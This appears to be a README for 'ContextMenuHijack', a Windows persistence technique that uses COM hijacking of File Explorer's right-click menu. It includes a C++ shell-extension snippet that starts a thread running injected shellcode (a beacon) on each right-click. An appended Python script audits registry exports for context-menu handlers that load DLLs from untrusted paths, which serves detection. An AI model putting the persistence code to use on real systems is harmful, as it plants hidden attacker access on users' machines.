ContextMenuHijack is a simple persistence technique that uses COM hijacking and relies on ordinary user behavior: when you right-click a file or folder in File Explorer to open the context menu, the beacon we specified is executed at the same time.
```cpp
IFACEMETHODIMP FileContextMenuExt::Initialize(
    LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID
)
{
    DWORD tid = NULL;
    CreateThread(NULL, 1024 * 1024, (LPTHREAD_START_ROUTINE)InjectShc, NULL, 0, &tid);

    if (NULL == pDataObj) {
        if (pidlFolder != NULL) {
        }
        return S_OK;
    }
    return S_OK;
}
```
Usage: this persistence trick needs admin privileges.
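A defender-side audit for this technique, as an added example that is not part of the ContextMenuHijack project: it parses a `reg export` text dump, resolves each `shellex\ContextMenuHandlers` entry to its `InprocServer32` DLL, and reports handlers loaded from outside a trusted-directory list. The sample export, CLSIDs, paths and the trusted list are constructed assumptions, and only plain string values are parsed.

```python
import re

# Constructed sample in `reg export` (.reg) text form; CLSIDs and paths are made up.
SAMPLE_REG = r'''
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ExampleArchiver]
@="{11111111-1111-1111-1111-111111111111}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\{22222222-2222-2222-2222-222222222222}]
@=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\InprocServer32]
@="C:\\Program Files\\ExampleArchiver\\ctxmenu.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-222222222222}\InprocServer32]
@="C:\\Users\\Public\\Libraries\\menu.dll"
'''

# Assumed allow-list of install locations; tune it to the fleet being audited.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\", "c:\\program files (x86)\\")
GUID = re.compile(r"\{[0-9a-fA-F-]{36}\}")

def parse_default_values(reg_text):
    """Map each key path (lower-cased) to its default (@) string value."""
    keys, current = {}, None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, "")
        elif current and line.startswith('@="') and line.endswith('"'):
            keys[current] = line[3:-1].replace("\\\\", "\\")  # undo .reg escaping
    return keys

def suspicious_handlers(reg_text, trusted=TRUSTED_DIRS):
    """Return (handler key, CLSID, DLL path) for handlers loading from untrusted paths."""
    keys, findings = parse_default_values(reg_text), []
    for key, default in keys.items():
        parent, _, name = key.rpartition("\\")
        if not parent.endswith("\\shellex\\contextmenuhandlers"):
            continue
        # The CLSID is either the key's default value or the key name itself.
        match = GUID.search(default) or GUID.search(name)
        if not match:
            continue
        clsid = match.group(0).lower()
        suffix = f"\\clsid\\{clsid}\\inprocserver32"
        dll = next((v for k, v in keys.items() if k.endswith(suffix)), "")
        if not dll.lower().startswith(trusted):
            findings.append((key, clsid, dll or "<unresolved>"))
    return findings
```

A handler reported as `<unresolved>` means its CLSID registration was not in the export, so the dump should be widened before the entry is judged.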